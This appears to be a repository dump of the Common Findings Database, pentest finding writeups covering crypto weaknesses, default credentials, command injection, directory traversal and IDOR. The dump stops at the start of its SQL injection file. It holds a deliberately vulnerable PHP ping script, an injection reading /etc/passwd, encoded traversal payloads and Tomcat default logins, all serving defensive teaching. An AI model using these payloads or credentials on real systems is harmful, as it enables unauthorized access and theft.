├── .gitignore
├── Assets
    └── Web
    │   ├── SQLi_0.png
    │   ├── SQLi_1.png
    │   ├── SQLi_2.png
    │   ├── SQLi_3.png
    │   ├── injection_0.png
    │   ├── injection_1.png
    │   ├── injection_2.png
    │   └── injection_3.png
├── CONTRIBUTING.md
├── Crypto
    ├── Block_Cipher_Uses_ECB_Mode.md
    └── Password_Storage_Via_Fast_Hashing_Algorithm.md
├── LICENSE
├── Printers
    └── Default_Credential.md
├── README.md
├── TEMPLATE.md
├── Tomcat
    └── Default Credential.md
├── Web
    ├── Command_Injection.md
    ├── Default_Credential.md
    ├── Directory_Traversal.md
    ├── Insecure_Direct_Object_Reference.md
    ├── Redirection_Based_Privilege_Escalation.md
    ├── SQL_Injection.md
    ├── Server-Side Request Forgery.md
    ├── WeakSSL.md
    ├── XSS_Reflective.md
    ├── XSS_Stored.md
    ├── XSTE.md
    └── imgs
    │   ├── ssrf1.png
    │   ├── ssrf2.png
    │   ├── ssrf3.png
    │   ├── ssrf4.png
    │   └── ssrf5.png
├── Windows
    ├── Old_KRBTGT_Password.md
    ├── Powershell.md
    ├── Shared_Admin.md
    ├── WDigest.md
    ├── WPAD.md
    └── Weak_SPN_Password.md
└── Wireless
    ├── EAP-TLS.md
    ├── WEP.md
    ├── WPA-PSK.md
    └── WPS.md


/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | 


--------------------------------------------------------------------------------
/Assets/Web/SQLi_0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_0.png


--------------------------------------------------------------------------------
/Assets/Web/SQLi_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_1.png


--------------------------------------------------------------------------------
/Assets/Web/SQLi_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_2.png


--------------------------------------------------------------------------------
/Assets/Web/SQLi_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/SQLi_3.png


--------------------------------------------------------------------------------
/Assets/Web/injection_0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_0.png


--------------------------------------------------------------------------------
/Assets/Web/injection_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_1.png


--------------------------------------------------------------------------------
/Assets/Web/injection_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_2.png


--------------------------------------------------------------------------------
/Assets/Web/injection_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Assets/Web/injection_3.png


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: How to Contribute
 3 | Description: How to contribute to the CFDB
 4 | */
 5 | 
 6 | If you wish to contribute, you can do so in a couple ways:
 7 | 
 8 | 1. If you hate git, and everyone can understand that, simply copy and paste text into an "Issue" and we'll format it correctly and give proper attribution
 9 | 2. If you are so bold, please submit pull requests
10 | 
11 | Our format can be found on the template page so you can easily copy and paste it to get you started (you do not have to include an sections that are not applicable, or that you simply don't want to write)
12 | 
13 | <iframe width="960" height="720" src="https://www.youtube.com/embed/fkRtcZTv704?rel=0" frameborder="0" allowfullscreen></iframe>


--------------------------------------------------------------------------------
/Crypto/Block_Cipher_Uses_ECB_Mode.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Block Cipher Uses ECB Mode
 3 | Description: A block cipher using ECB mode may reveal the contents of its ciphertext.
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/12/1
 7 | - LAST UPDATED BY: @zaeyx
 8 | 
 9 | ## Summary
10 | 
11 | A block cipher in ECB mode encrypts every block of plaintext into ciphertext without using any additionaly nonce/input.  What this results in is that for every pair of matching plaintext inputs, their corresponding ciphertexts will also match.
12 | 
13 | ## Capabilities and Risk
14 | 
15 | Though each block is still effectively encrypted to the specifications of the algorithm selected.  ECB mode does not do anything to change the output of a block to differentiate it from any other block if the two blocks are identical.  What this means in effect, is that if you encrypted the message "zaeyx is a cool dude, dude."  The "dude"s would come out as the same ciphertext.  The output might look something like "yuqbd jd q eadn defg, defg."  This reveals information about the plaintext.  And might in some cases be enough to allow the decryption of the entire message.  
16 | 
17 | ## Detection
18 | 
19 | Detection of a block cipher operating in this mode can be accomplished by observing the output ciphertext for signs of repeating patterns equal to one block length.  With access to the cipher's implementation in code, one can check that ECB is or is not the mode of operation.
20 | 
21 | ## Remediation
22 | 
23 | One must not operate block ciphers in ECB mode.  Switch to a preferred mode such at CTR (counter) mode, or CBC (cipher block chaining) among others.
24 | 
25 | ## References
26 | 
27 | https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption
28 | https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Eng.pdf
29 | https://news.ycombinator.com/item?id=7959519
30 | 
31 | ## Exploitation
32 | 
33 | An attacker may exploit a ciphertext encrypted in this manner by comparing blocks to find repeating patterns.  The attacker may then use this information to reveal the plaintext of the ciphertext by careful analysis.
34 | 
35 | 


--------------------------------------------------------------------------------
/Crypto/Password_Storage_Via_Fast_Hashing_Algorithm.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Password Storage Uses Fast Hashing Algorithm      
 3 | Description: Storing password hashes produced from fast hashing algorithms increases the odds of passwords being cracked.
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/12/2
 7 | - LAST UPDATED BY: @zaeyx
 8 | 
 9 | ## Summary
10 | 
11 | Hashing algorithms are the defacto standard for disk resident password representation formats.  Such hashing algorithms are defined to only operate in one direction.  That is, they only turn plaintext passwords into their hashed form.  They cannot take a hash and "decrypt" it back into a plaintext password.  As such, an attacker attempting to reveal the plaintext associated with a hash has only one option, make brute force attempts at producing a matching hash.  Since hashing algorithms must also by definition be deterministic, if the attacker is able to find a hash which matches the hash he is attempting to "crack."  He can assume beyond all reasonable doubt that the plaintext he used to create that hash is the user's plaintet password.
12 | 
13 | The difference between "fast" and "slow" hashing algorithms is exactly that.  One algorithm takes very little time to compute.  The other takes much longer to compute, (is slow).
14 | 
15 | When dealing with fast hashing algorithms, and attacker is able to make many more guesses in the same amount of time, increasing his chance of finding the resulting plaintext password.
16 | 
17 | ## Capabilities and Risk
18 | 
19 | Fast hashing algorithms are used primarily for their simplicity/ease of use, and speed/insignificant load on computational resources.  However when using fast hashing algorithms, you must understand that the passwords stored with this algorithm are potentially orders of magnitude easier to reveal to an attacker, should he gain access to the stored hashes.
20 | 
21 | With the plaintext passwords in hand, the attacker is highly likely to use the information to further his malicious intentions.  Or to leak the plaintext passwords on the internet in an attempt to embarrass and humiliate your service in the eyes of the public.
22 | 
23 | ## Detection
24 | 
25 | Detection of such a vulnerability is exceedingly simple.  Determine if the algorithms your service uses to hash passwords is a fast or slow hashing algorithm (if it is a hashing algorithm at all).  
26 | 
27 | Examples of fast hashing algorithms are as follows:
28 | *	[SHA-1](https://en.wikipedia.org/wiki/SHA-1)
29 | *	[MD-5](https://en.wikipedia.org/wiki/MD5)
30 | *	[SHA-2](https://en.wikipedia.org/wiki/SHA-2)
31 | *	[LM](https://en.wikipedia.org/wiki/LM_hash)
32 | 
33 | If access to the application is limited for the purposes of ascertaining the the name of the algorithm used, it is often possible to determine the algorithm that generated a hash by looking at the hash itself.
34 | 
35 | One such tool capable of performing this analysis to a limited extent is John the Ripper, which can be found [here.](http://www.openwall.com/john/)
36 | 
37 | ## Remediation
38 | 
39 | Remediation is simple.  One should upgrade any systems capable of receiving such an upgrade, to slow hashing algorithms. 
40 | 
41 | Examples of which are as follows: 
42 | *	[BCrypt](https://en.wikipedia.org/wiki/Bcrypt)
43 | *	[Crypt](https://en.wikipedia.org/wiki/Crypt_(C))
44 | *	[PBKDF2](https://en.wikipedia.org/wiki/PBKDF2)
45 | 
46 | Another interesting hashing algorithm is [SCrypt](https://en.wikipedia.org/wiki/Scrypt) which uses extensive amounts of memory rather than time in order to limit an attacker's ability to parallel compute when attacking a hash.
47 | 
48 | If for some reason it is impossible for a system or service to be upgraded from a fast hashing algorithm, it is then paramount that a proper password policy be set and enforced in order to increase the complexity of stored passwords and increase the work the attacker must perform.
49 | 
50 | An example of a password policy that might mitigate the use of fast hashing algorithm to some extent is as follows:
51 | 
52 | 	>>Min-Length:21
53 | 	>>Must Contain: Upper/Lower Alpha, Numeric, Special Char
54 | 	>>Recommend: Passphrase, not password
55 | 
56 | ## References
57 | 
58 | http://codahale.com/how-to-safely-store-a-password/
59 | 
60 | https://security.stackexchange.com/questions/4781/do-any-security-experts-recommend-bcrypt-for-password-storage
61 | 
62 | https://security.stackexchange.com/questions/15790/why-do-people-still-use-recommend-md5-if-it-is-cracked-since-1996
63 | 
64 | https://crackstation.net/hashing-security.htm
65 | 
66 | ## Exploitation
67 | 
68 | Exploitation for an attacker is quite simple.  Just load an unknown hash that into a hash crackingg piece of software such as [John the Ripper](http://www.openwall.com/john/) and wait.  With a fast hashing algorithm and a bit of luck, it won't take long.
69 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2019, Rob Fuller
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | 1. Redistributions of source code must retain the above copyright notice, this
10 |    list of conditions and the following disclaimer.
11 | 
12 | 2. Redistributions in binary form must reproduce the above copyright notice,
13 |    this list of conditions and the following disclaimer in the documentation
14 |    and/or other materials provided with the distribution.
15 | 
16 | 3. Neither the name of the copyright holder nor the names of its
17 |    contributors may be used to endorse or promote products derived from
18 |    this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/Printers/Default_Credential.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Default Credential (Printers)
 3 | Description: Default Credentials in printers are often over looked because of a misunderstood level of security risk.
 4 | Access to printers can give details used for data loss, network discovery, and firmware loading, which can allow for
 5 | additional functionalities to be loaded.
 6 | */
 7 | 
 8 | - LAST UPDATED DATE: 12/16/2015
 9 | - LAST UPDATED BY: Joey M. (l0stkn0wledge)
10 | 
11 | ## Summary
12 | 
13 | Most enterprise printers and many SOHO devices ship with an interface allowing for remote configuration of the devices that
14 | are located on the network.  In many cases, the security of these systems will be overlooked due to a lack of security
15 | understanding about the capabilities of these devices.  This can allow printers to act as a means to gain network details
16 | and to potentially gain access to sensitive information being printed.
17 | 
18 | ## Capabilities and Risk
19 | 
20 | Many of the capabilities and risks depend on the features of the printer. More advanced devices will often provide details
21 | of the documents printers, including potential username information. Some printers may have "advanced functions" that can
22 | provide additional network information. 
23 | 
24 | - Gain access to printer files and configuration
25 | - Execute programs from the printer by loading custom firmware images
26 | - Read files on the printer and potentially intercept printed files
27 | 
28 | ## Detection
29 | 
30 | Printers with Web UIs will most often standard http/https ports (80/443).  Additional functionality may also be exposed
31 | through the printer ports (e.g. HP JetDirect port 9100).  
32 | 
33 | ## Remediation
34 | 
35 | Printers should have all web interface passwords changed to strong passwords. Additionally, it is important to ensure that
36 | only SSL is available for login when the option is available.
37 | 
38 | ## References
39 | 
40 | - IronGeek page on Printer Hacking (http://www.irongeek.com/i.php?page=security/networkprinterhacking)
41 | - Deral Heiland: From Printer to Pwned (https://www.youtube.com/watch?v=PH4pTCmKgOg)
42 | - Extensive Default Password List (http://www.defaultpassword.com/)
43 | 
44 | ## Exploitation
45 | 
46 | Standard web interface used for accessing UI and entering passwords.
47 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: What is the CFDB?
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | # Common Findings Database
 7 | 
 8 | Source: https://github.com/mubix/cfdb
 9 | 
10 | The Common Findings Datase is a collection of markdown based findings writeups.
11 | The goal of which is 3 fold:
12 | 
13 | 1. Create a place for collaboration to happen in regard to findings
14 | 2. Help to unify finding recommendations and references
15 | 3. Assist new and upcoming Information Security professionals in learning
16 | 
17 | You can find the live, searchable version at http://cfdb.io/
18 | 
19 | Other awesome projects along the same lines:
20 | 
21 | - MITRE's ATT&CK: https://attack.mitre.org/wiki/Main_Page
22 | - TECAPI List of Attack Vectors: http://tecapi.com/
23 | - VULNDB User, contributor and developer friendly vulnerability database: https://github.com/vulndb/data
24 | - Vulnerability Reporting Database by @calebwatt15: https://github.com/calebwatt15/vrdb
25 | - Veris Community Database: https://github.com/vz-risk/VCDB
26 | 


--------------------------------------------------------------------------------
/TEMPLATE.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Template
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 
 7 | - LAST UPDATED BY: 
 8 | 
 9 | ## Summary
10 | 
11 | A brief summary of the finding
12 | 
13 | ## Capabilities and Risk
14 | 
15 | This is to replace any "level" or "score" because of how much context is needed
16 | for a finding to have one, which is beyond the scope of this database.
17 | 
18 | - List of possible uses for this finding to give real-world uses
19 | - Read files as www-data (or use web server is running as)
20 | - DDoS service
21 | - Code execution (for this one to fly there needs to be a refence proving it)
22 | 
23 | ## Detection
24 | 
25 | How does one detect the exploitation of this finding, or detect its presence.
26 | 
27 | ## Remediation
28 | 
29 | What are some of the ways to fix this finding?
30 | 
31 | ## References
32 | 
33 | - Link to blog post
34 | - Link to CVE
35 | - Link to Metasploit module
36 | - Link to Nessus/NeXpose/Qualys write up
37 | 
38 | ## Exploitation
39 | 
40 | A write up on how this finding can be exploited with demo code or screen shots
41 | 
42 | 
43 | ## Copy / Paste:
44 | ```
45 | /*
46 | Title: Finding Title
47 | Description: Search engine meta data about the finding
48 | */
49 | 
50 | - LAST UPDATED DATE: 
51 | - LAST UPDATED BY: 
52 | 
53 | ## Summary
54 | 
55 | A brief summary of the finding
56 | 
57 | ## Capabilities and Risk
58 | 
59 | This is to replace any "level" or "score" because of how much context is needed
60 | for a finding to have one, which is beyond the scope of this database.
61 | 
62 | - List of possible uses for this finding to give real-world uses
63 | - Read files as www-data (or use web server is running as)
64 | - DDoS service
65 | - Code execution (for this one to fly there needs to be a refence proving it)
66 | 
67 | ## Detection
68 | 
69 | How does one detect the exploitation of this finding, or detect its presence.
70 | 
71 | ## Remediation
72 | 
73 | What are some of the ways to fix this finding?
74 | 
75 | ## References
76 | 
77 | - Link to blog post
78 | - Link to CVE
79 | - Link to Metasploit module
80 | - Link to Nessus/NeXpose/Qualys write up
81 | 
82 | ## Exploitation
83 | 
84 | A write up on how this finding can be exploited with demo code or screen shots
85 | ```


--------------------------------------------------------------------------------
/Tomcat/Default Credential.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Tomcat Manager - Default Login Credentials
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | Default Tomcat Management credentials  
12 | 
13 | ## Capabilities and Risk
14 | 
15 | This is to replace any "level" or "score" becuase of how much context is needed
16 | for a vulnerability to have one which is beyond the scope of this database.
17 | 
18 | - List of possible uses for this vulnerability to give real-world uses
19 | - Read files as www-data (or use web server is running as)
20 | - DDoS service
21 | - Code execution (for this one to fly there needs to be a refence proving it) 
22 | 
23 | ## Detection
24 | 
25 | Default credentials can be tried by authenticating witht the http Tomcat login. The list below contains default Tomcat credentials.
26 | 
27 | **username/password**
28 | - tomcat/tomcat
29 | - both/tomcat
30 | - role1/tomcat
31 | - manager/manager
32 | - admin/admin
33 | 
34 | 
35 | ## Remediation
36 | 
37 | Default accounts should be disabled or have their password reset.
38 | 
39 | ## References
40 | 
41 | - Link to blog post
42 | - Link to CVE
43 | - Link to Metasploit module
44 | - Link to Nessus/NeXpose/Qualys write up
45 | 
46 | ## Exploitation
47 | 
48 | The tomcat management console can be accessed by navigating to the url: http://x.x.x.x:8080/manager
49 | 


--------------------------------------------------------------------------------
/Web/Command_Injection.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Command Injection
 3 | Description: Injection of commands through web application onto host machine.
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/12/1
 7 | - LAST UPDATED BY: @zaeyx
 8 | 
 9 | ## Summary
10 | 
11 | Command Injection occurs when an insecure application passes unsafe user supplied content to a system shell.  
12 | 
13 | ## Capabilities and Risk
14 | 
15 | When Command Injection occurs, and attacker may be able to execute arbitrary commands as the web application's host machine.  This gives effective control over whatever portion of the host machine the web server's user is given access to.  
16 | 
17 | ## Detection
18 | 
19 | Detection can be accomplished by searching for command line access by the web server's user that is not expected to have been given by the normal operations of the application.  For example, if an application uses command line operations to perform a ping.  If the web server's user is executing any command other than "ping" you might have a problem.
20 | 
21 | One can search for abnormal commands in a number of ways, including but not limited to monitoring web user command line history, monitoring of logs (such as apache's access.log, monitoring of network traffic to detect requests on the wire (IDS for example), and hardcoding monitoring routines into the application itself.
22 | 
23 | ## Remediation
24 | 
25 | Sanitize input that is passed to the system shell from an untrusted source.
26 | 
27 | Here are a number of resources to assist you in properly sanitizing data in a number of languages.
28 | 
29 | [PHP](https://stackoverflow.com/questions/982904/best-way-to-sanitize-exec-command-with-user-inserted-variables) 
30 | 
31 | [ASP.NET](https://msdn.microsoft.com/en-us/library/ff647397.aspx) 
32 | 
33 | [Ruby Rails](https://code.google.com/p/ruby-security/wiki/Guide#Good_ol%27_shell_injection)
34 | 
35 | [Java](https://www.securecoding.cert.org/confluence/display/java/IDS07-J.+Sanitize+untrusted+data+passed+to+the+Runtime.exec()+method)
36 | 
37 | [Python/Ruby](http://blog.littleimpact.de/index.php/2008/08/11/avoiding-shell-injection-in-ruby-python-and-php/)
38 | 
39 | Input sanitization is accomplished by removing/escaping special characters from user supplied input.  Or by properly quoting the user supplied input.
40 | 
41 | 
42 | ## References
43 | 
44 | https://www.owasp.org/index.php/Command_Injection
45 | 
46 | ## Exploitation
47 | 
48 | To exploit this vulnerability, an attacker simply injects into a vulnerable field a command seperator for the system type (linux, windows) of the host machine in question.  Followed by the command to be executed.  
49 | 
50 | The command seperator is used to end the command that the application expects to execute, and everything that follows is added as commands appended to the application's usual request.
51 | 
52 | For example, if an application takes user input in the form of an IP address to "ping" from the command line; and the application does not correctly sanitize input:  A normal request might look like "ping user_supplied_ip".  The injection might look like "ping && cat /etc/passwd".
53 | 
54 | Example is illustrated below.
55 | 
56 | ```php
57 | <?php
58 | 
59 | if(isset($_GET['ip'])) {
60 |         $ip = $_GET['ip'];
61 |         $output = shell_exec("ping -c 3 $ip");
62 |         echo "<pre>$output</pre>";
63 | }
64 | ?>
65 | ```
66 | The PHP code above is vulnerable to command injection since it does not sanitize any input.
67 | 
68 | **Here is what the ping form might look like with a user supplied IP to ping.**
69 | ![injection](../Assets/Web/injection_0.png)
70 | 
71 | **Once the user submits the form the site takes the IP parameter and drops it to the command line where it executes the command above.**
72 | ![injection](../Assets/Web/injection_1.png)
73 | 
74 | **However if the user was to supply a command seperator as seen here (Linux command seperator) they would be able to execute arbitrary commands, not just ping.**
75 | ![injection](../Assets/Web/injection_2.png)
76 | 
77 | **And the results...**
78 | ![injection](../Assets/Web/injection_3.png)
79 | 
80 | As you can see, exploitation is quite simple in a basic scenario like this.
81 | 


--------------------------------------------------------------------------------
/Web/Default_Credential.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Default/Guessable Login Credentials
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 
 7 | - LAST UPDATED BY: 
 8 | 
 9 | ## Summary
10 | 
11 | A brief summary of the vulnerability
12 | 
13 | ## Capabilities and Risk
14 | 
15 | This is to replace any "level" or "score" becuase of how much context is needed
16 | for a vulnerability to have one which is beyond the scope of this database.
17 | 
18 | - List of possible uses for this vulnerability to give real-world uses
19 | - Read files as www-data (or use web server is running as)
20 | - DDoS service
21 | - Code execution (for this one to fly there needs to be a refence proving it)
22 | 
23 | ## Detection
24 | 
25 | How does one detect the exploitation of this vulnerability, or detect its presence.
26 | 
27 | ## Remediation
28 | 
29 | What are some of the ways to fix this vulnerability?
30 | 
31 | ## References
32 | 
33 | - Link to blog post
34 | - Link to CVE
35 | - Link to Metasploit module
36 | - Link to Nessus/NeXpose/Qualys write up
37 | 
38 | ## Exploitation
39 | 
40 | A write up on how this vulnerability can be exploited with demo code or screen shots
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/Web/Directory_Traversal.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Directory Traversal / File Include
 3 | Description: Web server ACLs permit direct access to files outside the intended directory
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 12/14/2015
 7 | - LAST UPDATED BY: Mike S. (hardwaterhacker) 
 8 | 
 9 | ## Summary
10 | 
11 | Insufficient web server ACLs and/or input sanitization allow direct file access requests for files outside of the
12 | intended directory or document root directory.
13 | 
14 | ## Capabilities and Risk
15 | 
16 | - Information disclosure (reading files as web server user)
17 | - Overwrite files (overwrite files as web server user)
18 | - Denial of Service
19 | 
20 | ## Detection
21 | 
22 | To detect directory traversal vulnerabilities, the application must first be mapped to identify parameters which
23 | reference files on the server, such as /profile.php?user=bob.html or /display.asp?page=../main.html.  Once the target
24 | pages and parameters have been identified, attempt to access files which would likely reside on the target system.
25 | Identifying the operating system, web server software and version, and application version will assist in identifying
26 | likely candidates.
27 | 
28 | If the server is vulnerable to directory traversal, it will be possible to "escape" from the
29 | intended directory and/or document root by referencing a series of directories above the intended directory using
30 | dot-dot-slash ("../") notation.  Depending on the starting directory, several dot-dot-slashes to reach the target
31 | directory.
32 | 
33 | Example #1: Linux password file
34 | 
35 | http://www.example.com/profile.php?user=../../../../../etc/passwd
36 | 
37 | Example #2: Window.ini
38 | 
39 | http://www.example.com/display.asp?page=../../../../../Windows/system.ini
40 | 
41 | ### Windows Web Servers
42 | 
43 | If the target web server is running on Windows, it may be necssary to use back slashes ("\") instead of forward slashes.
44 | 
45 | ### Absolute Path Traversal
46 | 
47 | In some instances, it may be possible to specify the absolute path of the file.
48 | 
49 | Example #3: Linux password file via absolute path traversal
50 | 
51 | http://www.example.com/profile.php?user=/etc/passwd
52 | 
53 | ### Encoding
54 | 
55 | During testing, it may appear that the web server ACLs and input sanitization are functioning properly.  Testing should
56 | also include requests using character encoding to bypass input sanitization routines in the application.
57 | 
58 | Encoding Example #1:
59 | 
60 | http://www.example.com/profile.php?user=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
61 | 
62 | Encoding Example #2:
63 | 
64 | http://www.example.com/profile.php?user=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
65 | 
66 | ### Overwriting files
67 | 
68 | If the web application uses client-supplied input to specify the target location or file name for file uploads, it may
69 | be possible to overwrite existing files, provided the web server user has write permissions to the target file and
70 | directory.  In some instances, this may result in a denial of service condition.  Testing for directory traversal file
71 | overwrite vulnerabilities uses the same methods outlined above.
72 | 
73 | ## Remediation
74 | 
75 | The developer should define the intended document root directory or directories that are valid for the file access
76 | request.  All file access requests should be compared against this list of valid directories.  Additionally, whenever
77 | client-supplied input (including cookies and headers) is used as part of a file access request, input sanitization
78 | should be employed using a whitelist filter.
79 | 
80 | ## References
81 | 
82 | - https://www.owasp.org/index.php/Path_Traversal
83 | - https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
84 | - https://cwe.mitre.org/data/definitions/22.html
85 | - https://cwe.mitre.org/data/definitions/23.html
86 | - https://cwe.mitre.org/data/definitions/36.html
87 | 
88 | ## Exploitation
89 | 
90 | See examples above.
91 | ```
92 | ```
93 | 


--------------------------------------------------------------------------------
/Web/Insecure_Direct_Object_Reference.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Insecure Direct Object Reference
 3 | Description: Directly access application objects (files, database records, messages, etc.) owned by other users
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 12/14/2015
 7 | - LAST UPDATED BY: Mike S. (hardwaterhacker)
 8 | 
 9 | ## Summary
10 | 
11 | Insecure Direct Object Reference results from using user-supplied input to directly reference objects.  Insecure 
12 | Direct Object References allow attackers directly reference objects by manipulating the parameter value controlling
13 | the object reference, allowing access to objects owned by other application users.
14 | 
15 | ## Capabilities and Risk
16 | 
17 | Capabilities:
18 | - Direct access to database records, messages, files, etc.
19 | 
20 | ## Detection
21 | 
22 | To detect Insecure Direct Object Reference, the application must first be mapped to identify parameters which may 
23 | control object references, such as ?invoice=12345 or ?msgId=654321.  After identifying potential testing points, attempt 
24 | to enumerate other objects by manipulating the value associated with the identified parameter.  Insecure Direct Object 
25 | Reference exists when the application returns objects belonging to other application users.
26 | 
27 | Typically, Insecure Direct Object Reference exists within the authentication boundary of the application.  However, in 
28 | poorly designed authentication and authorization schemes, it may be possible to access objects for which authentication 
29 | is normally required.  For example, if a company's support page offers only certain knowledgebase articles to 
30 | unauthenticated users and requires authentication for all others, it may be possible to access articles which normally 
31 | require authentication.  In this example, if kbarticle.php?article=12345 is viewable by unauthenticated users, but 
32 | article=55555 is intended for only authenticated users, if article=55555 is accessible by an unauthenticated user then 
33 | Insecure Direct Object Reference exists.
34 | 
35 | ## Remediation
36 | 
37 | To prevent Insecure Directo Object References, the web application must assign ownership of each referenceable object to 
38 | a given user, set of users, or group.  Whenever objects are referenced, the authorization record for the referened 
39 | object must be compared against the requesting user.  Users lacking appropriate authorization should be denied access to 
40 | the object.
41 | 
42 | ## References
43 | 
44 | https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
45 | https://cwe.mitre.org/data/definitions/639.html
46 | https://cwe.mitre.org/data/definitions/22.html
47 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8487
48 | http://blog.attify.com/2015/05/26/offensive-security-oscp-student-control-panel-owned/
49 | 
50 | ## Exploitation
51 | 
52 | 1. Identify parameters which reference objects
53 | 2. Enumerate objects using BurpSuite Intruder or similar methods
54 | 3. Determine if objects are owned by another user or should be referenceable by requester
55 | 
56 | ```
57 | ```
58 | 


--------------------------------------------------------------------------------
/Web/Redirection_Based_Privilege_Escalation.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Redirection Based Privilege Escalation
 3 | Description: Leverage of XSS on one page to escalation control over application flow.
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/12/1
 7 | - LAST UPDATED BY: @zaeyx
 8 | 
 9 | ## Summary
10 | 
11 | Redirection Based Privilege Escalation describes a situation in which a web application is split into at least two parts.  One highly secure section (such as a payment system) and one less secured section (an index page perhaps).  When an attacker gains access to the less secure portion of the site, he may leverage this capability to gain access to the application flow and in effect escalate his privileges to exploit the more secure section.
12 | 
13 | ## Capabilities and Risk
14 | 
15 | An attacker may utilize this technique to turn access to a less secured section of a site into full application flow control. 
16 | 
17 | More work is spent securing the highly sensitive section of the site.  But a vulnerability is a less sensitive section of the site is potentially just as dangerous under this model.
18 | 
19 | ## Detection
20 | 
21 | Detection relies on the application defense team being able to detect the underlying XSS in the less sensitive portion of the application.  
22 | 
23 | Additional detection methods include writing hidden javascript routines into the code of the site which send an alert home if they are hosted somewhere other than the original site.
24 | 
25 | ## Remediation
26 | 
27 | Do not keep the security of one portion of the site your highest priority.  Control over application flow can be achieved with an injection to any section for the subset of users which visit that section.
28 | 
29 | ## Exploitation
30 | 
31 | An attacker may in effect escalate their privileges to gain access to application flow by first finding an injectable field in any one portion of the site.  The attacker then injects into that field a script that performs a redirection to a site that they have control over.  The attacker clones the insecure application and redeploys a copy on their malicious site.  
32 | 
33 | When a user visits the page containing the injection they are redirected to the attacker's malicious copy of the vulnerable application.  This happens transparently, and unless the user is exceptionally privy they are unlikely to notice the redirection.  They will then continue to use the application as before.  Potentially accessing the highly secure sections (such as the payment system) on the attacker's malicous site.
34 | 


--------------------------------------------------------------------------------
/Web/SQL_Injection.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: SQL Injection
 3 | Description: Injection of SQL commands directly into database
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/12/1
